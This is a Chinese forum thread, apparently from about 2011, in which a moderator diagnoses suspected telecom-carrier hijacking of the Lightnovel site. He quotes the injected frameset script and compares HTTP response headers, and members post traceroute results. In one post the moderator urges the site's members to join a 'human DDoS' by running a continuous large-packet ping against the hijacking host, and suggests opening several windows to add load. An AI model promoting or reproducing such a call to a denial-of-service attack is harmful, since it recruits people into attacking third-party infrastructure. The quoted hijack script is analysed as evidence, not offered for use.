关于近日轻国各种访问问题的说明

tippisum

问题的临时解决方案：https://obsolete1.lightnovel.us/viewthread.php?tid=271620&extra=page%3D1
仅适用于Firefox和Chrome浏览器

近日部分会员在访问轻国时出现地址栏始终显示首页地址，页面下方出现横条，发帖/评分的弹出窗口出问题等症状
经检查和测试，问题已经确定：

这都是万恶的电信运营商在搞鬼！

证据就是协助测试的会员在出问题的页面保存下来的源代码：

1. <html>
   
2. <head>
   
3. </head>
   
4. <script>
   
5. function sho()
   
6. {
   
7. var CK=document.cookie;
   
8. var sa=CK.indexOf("CK");
   
9. if(sa!=-1){}else{var EP=new Date();
   
10. EP.setTime(EP.getTime()+24*60*60*1000);
    
11. document.cookie="CK=test;expires="+EP.toGMTString();
    
12. self.hi.location="http://php30.3322.org:8832/Xm05/index.html";}
    
13. }
    
14. </script>
    
15. <frameset rows="100%,*" onLoad="sho()">
    
16. <frame name="hello" src="/redirect.php?tid=270685&goto=lastpost&from=fastpost&random=0.9002511039117831&updatedata=index">
    
17. <frame name="hi" src="">
    
18. </frameset>
    
19. </html>

复制代码

明眼人大概不用我多说也可以知道发生什么了。
简单来说就是电信运营商劫持了轻之国度的所有页面，然后返回一个页面执行它自己的脚本，然后再开一个框架（相当于论坛的发帖/评分窗口）把原始页面嵌进去，看起来貌似天衣无缝。
因为每打开一个页面相当于打开一个浮动窗口，所以浏览器地址栏不会改变。
然后这帮傻X（原谅我使用不文明用语，不过考虑到他们自己刷新的下限，我认为使用这个词已经表现我相当克制）做劫持页面也不仔细调试，每点一个链接嵌套就多一层，于是每打开一个网页，页面底下就多一个横条，最后就over了……至于浮动窗口打不开，原因类似。

Google搜索php30.3322.org，结果是“广西电信宽带测速”，罪证确凿无误。

因为这是电信运营商搞鬼，所以我很抱歉地告诉大家，我们对此完全无能为力。
这个问题会随着你使用不同的网络而不同，可能不会出现。除了轻之国度，很可能还有其他的网站也受到影响。

PS，3322.org 和本次事件无任何关系，它只是提供动态域名解析服务而已。但是由它负责解析的网站里面有很多垃圾站和钓鱼站，因此看到带有这个后缀的网址的时候请保持你的警惕。

-----

关于是不是服务器的问题：
根据测试，这个问题为间歇性，而且有的人遇到有的人没有遇到。也就是无论是从时间上还是从网络位置上来看均具有不确定性。
服务器对于所有的访问者来说都是一样的，无论它到底是正常还是不正常。如果真的是服务器的问题，那么所有的人应该都会遇到相同的问题。
而实际情况并非如此。尤其是从页面上被插入内容的实际情况来看，来自线路问题的可能性较大。
如果还需要证据的话，各位可以尝试在百度和Google上面去取网页快照（Google快照需要代理访问），分析快照抓取下来的页面代码可以知道，它们所抓取的页面都是正常的，没有嵌入上述脚本，这是服务器端没有问题的最好证据。毕竟，Google和百度没必要掩盖问题吧？

-----

进一步的调查结果：
通过Firebug分析网页加载信息。这是出问题的首页收到的HTTP响应头：

Server	Microsoft-IIS/5.1
X-Powered-By	ASP.NET
Date	Wed, 08 Apr 2009 17:10:17 GMT
Content-Type	text/html
Accept-Ranges	bytes
Last-Modified	Wed, 08 Apr 2009 17:10:05 GMT
Etag	"ea54c1dc6cb8c91:9e2"
Content-Length	452

而这是真正由轻之国度服务器返回的HTTP响应头：

Connection	close
Date	Mon, 31 Jan 2011 08:08:41 GMT
Content-Type	text/html
Server	Microsoft-IIS/6.0
X-Powered-By	ASP.NET, PHP/5.2.1
Content-Encoding	gzip
Vary	Accept-Encoding
Transfer-Encoding	chunked

大家可以注意到，两个响应头是不一样的。这说明了什么？
HTTP 响应标头是服务器与浏览器通信的时候发送的数据，用于表明服务器的身份。如果两个HTTP响应头不同，那么它们一定来自两台不同的服务器。
更确切的证据来自于 Server 字段。其中轻之国度服务器使用的是 Microsoft-IIS/6.0，这是服务器的通常配置。而上面的响应头中，Server 字段则是 Microsoft-IIS/5.1，这个古老的版本表明这台服务器所使用的操作系统是 Windows 2000 Server 或者 Windows XP。事实上，我更倾向于那位“幕后黑手”先生大概真的就是拿了一个装着盗版 Ghost XP 的电脑大摇大摆地劫持轻之国度的访问……总之，发出前一个响应的服务器，一定不可能是轻之国度的服务器
言归正传。这个信息说明了什么？很简单，你所收到的网页，它根本就不是由轻之国度的服务器发出的，而是在半路上就被某个家伙给掉包了。所以说，服务器到底有没有被挂马？其实这个问题已经根本不重要了，因为接收到的数据压根就不是由轻之国度的服务器发送的。

另外的附加证据就是，大部分的页面元素（包括页面数据，脚本，以及各种按钮的背景图片之类）最终都还是被重新定位到了由真正的轻之国度的服务器发送的数据，所以页面的显示基本正常。但是，所有的头像（非外链）以及调出浮动窗口的脚本，都收到了那个伪造的“服务器”的响应，理所当然的，那个伪造“服务器”上根本就没有这些数据。所以所有的头像全部无法显示，浮动窗口也无法打开。这正好和汇报的症状相一致。

-----

总之，现在已经联系站长……请他帮忙检查服务器状况以及向主机商询问……各位稍安勿躁……
如果悬浮窗口打不开的话请直接打开新窗口，各种错误什么的请暂时选择性无视之。AJAX管理什么的……呃……这个我只能说，请挂代理吧。代理服务器的线路有一部分还是正常的。
PS，如果有对电信不爽的人，你可以为人肉DDoS贡献自己的一份力量，方法很简单，开始->运行（快捷键：Windows徽标键+R）->输入cmd，打开命令提示符
输入如下命令：

1. ping -l 65500 -t php30.3322.org

复制代码

然后把这个窗口最小化（但是不要关闭）。每个人的力量虽然微小，不过轻国有20多万会员，大家一起来这么做的话就不一样了。
现在已经有一些人行动起来了，并且取得了初步的成效……请大家为了让轻国早日恢复，也做一点力所能及的事情。
ps的ps，关闭窗口即可停止程序，如果觉得执行速度太慢可以多开几个窗口一起执行。

liyujia25

便条你用你的贞操发誓没有搞错我马上打= =


不过....我该怎么说.....客服肯定不懂...技术部门肯定会一对专业术语先弄晕我= =

月下流麗

网通线路很卡是怎么回事？

saleung

版主,小的來自hk
用的供應商是hkbn
這些日子除了訪問輕國之外上中國內地網站都沒出過問題
(如一些線上漫畫網,115或百度等)
所以版主大人
問題出自我家的網絡服務供應商好像不太對得上的樣子
所以真的不太明白是怎樣的一回事

zsy891121

我网通也这样。。。
同样是电信劫持。。。我该打给谁去啊。。。

金色的毁灭

"对你访问的页面"是指轻国的页面？

tippisum

对于非电信线路反应同样问题的，请做如下测试：
开始->运行，输入cmd，打开命令提示符
然后输入以下命令：

1. tracert www.lightnovel.cn

复制代码

然后把结果贴出来，我再进一步分析一下

zsy891121

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>tracert www.lightnovel.cn

Tracing route to www.lightnovel.cn [121.207.232.100]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2   202 ms   229 ms   219 ms  123.132.192.1
  3     4 ms     4 ms     3 ms  61.179.44.193
  4   287 ms   102 ms    19 ms  61.156.156.133
  5    21 ms    53 ms   242 ms  219.158.14.77
  6   147 ms   263 ms   215 ms  219.158.13.10
  7   208 ms   319 ms   234 ms  219.158.32.2
  8   306 ms   298 ms   157 ms  202.97.44.69
  9   343 ms   342 ms   302 ms  202.97.66.158
10   313 ms   335 ms   337 ms  222.77.191.70
11     *        *        *     Request timed out.
12   275 ms   409 ms   336 ms  www.lightnovel.cn [121.207.232.100]

Trace complete.

C:\Documents and Settings\Administrator>


顺便我上网查了下，广西电信宽带测速的网站是http://test.gxbs.net/
跟这个木马站地址一模一样。。。

tippisum

回复 9# zsy891121
192.168.1.1: 局域网网关
123.132.192.1: 山东省 联通
61.179.44.193: 山东省青岛市 联通
61.156.156.133: 山东省临沂市 联通
219.158.14.77: 中国 联通骨干网
219.158.13.10: 中国 联通骨干网
219.158.32.2: 北京市 联通; 中国 联通骨干网国际出口
202.97.44.69: 广西 电信骨干网
222.77.191.70: 福建省福州市 电信

根据推测，有可能只要线路里面经过广西电信的路由节点，就会在这个节点的地方被劫持……当然要确认的话还需要更多的数据

saleung

情況和9樓差不多
202.97.33.121
202.97.40.70
222.77.191.70

蓝祈

难怪这两天经常出现什么XML解析错误然后页面下面出横条。不过这个所谓的测速站点是干什么的？做广告？刷流量？内容

ajohnson1231

游客，本帖隐藏的内容需要积分高于 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 才可浏览，您当前积分为 0

109256

游客，本帖隐藏的内容需要积分高于 999999999 才可浏览，您当前积分为 0

电脑用OPERA上的表示没啥其他问题，就是地址栏永远是www.lightnovel.cn……

顺便手机上UC倒是出现好多如上所说问题……

wengcheong

我的检测结果好像很奇怪


问一下
能否以网站名义对广西电信什么的发出抗议？
会不会有用的呢？

遠野タカキ

游客，本帖隐藏的内容需要积分高于 99999 才可浏览，您当前积分为 0

zhxzcj

游客，本帖隐藏的内容需要积分高于 9999999999 才可浏览，您当前积分为 0

Lafrente

（前略）
12   207 ms   209 ms   233 ms  202.97.52.145
13   213 ms   208 ms   224 ms  202.97.60.9
14   233 ms   233 ms   238 ms  202.97.34.97
15   212 ms   225 ms   214 ms  202.97.35.5
16     *        *        *     请求超时。
17   283 ms   262 ms   262 ms  222.77.191.74
18     *        *        *     请求超时。
19   250 ms   322 ms   246 ms  www.lightnovel.cn [121.207.232.100]

这手玩得狠啊，电信一_,一

renrenxin

对此结论表示怀疑。
同样的论坛版本，就轻国的出问题，其他的没有发现。

另外，偶两台电脑，都是电信线路，单位的那台正常，家里用的那台出问题。怎么解释呢？

说下偶电脑的情况：单位的操作系统：win7 32位；家用的：win7 64位。浏览器都是火狐。

52178210

应该是服务器问题，我用firefox+ssh代理上，网速有点那个，但貌似图片好了，底部的黑线没好